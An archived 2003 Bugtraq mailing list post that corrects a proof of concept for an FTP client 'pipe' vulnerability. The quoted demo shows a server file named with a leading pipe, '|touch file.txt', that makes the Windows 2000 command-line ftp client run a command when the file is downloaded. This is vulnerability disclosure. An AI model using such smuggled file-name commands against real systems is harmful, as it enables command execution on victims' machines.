lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
From: schoe at oicinc.com (SChoe)
Subject: RE: Multiple Vendor FTP pipe Vulnerability

Oops.  The "touch" syntax is wrong due to my lack of cut-n-paste skills.

touch \|touch\ file     <--------Wrong
touch \|touch\ file.txt <--------Right

My bad...

On Tue, 25 Feb 2003, SChoe wrote:

> Date: Tue, 25 Feb 2003 12:17:50 -1000 (HST)
> From: SChoe <schoe@...inc.com>
> To: bugtraq@...urityfocus.com
> Cc: full-disclosure@...ts.netsys.com
> Subject: RE: Multiple Vendor FTP pipe Vulnerability
>
> Securityfocus has a post on its website regarding this vulnerability in
> many ftp clients.  I've tested and subsequently validated this issue on
> many of the platforms mentioned in their advisory.  They mention
> that the Netscape client on Windows 2000 Professional, but fails to
> mention that the commandline ftp client included with win2k (server and
> pro) are also vulnerable.
>
> <-----------------------snip----------------------->
> # Create file on ftp server for download by client.
> schoe@ftp:/home/ftp$ touch \|touch\ file
>
> # Start commandline ftp client on win2k.
> Microsoft Windows 2000 [Version 5.00.2195]
> <C> Copyright 1985-2000 Microsoft Corp.
>
> C:\ ftp ftp.xxxx.com
> ....
> ftp> get "|touch file.txt"
> ...
> ftp> quit
> 221 Goodbye.
>
> # "C:\file.txt" should now exist.
> <-----------------------snap----------------------->
>
> Multiple Vendor VTP pipe Vulnerability
> ======================================
> www.securityfocus.com/bid/396/info


.-------------------------------------------.
| Sung J. Choe <schoe[at]oicinc.com>, TICSA |
| Systems Admin, Facility Security Officer  |
.-------------------------------------------.---.
            | Oceanic Imaging Consultants, Inc. |
            | Phone #: (808) 539.3634           |
            .-----------------------------------.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ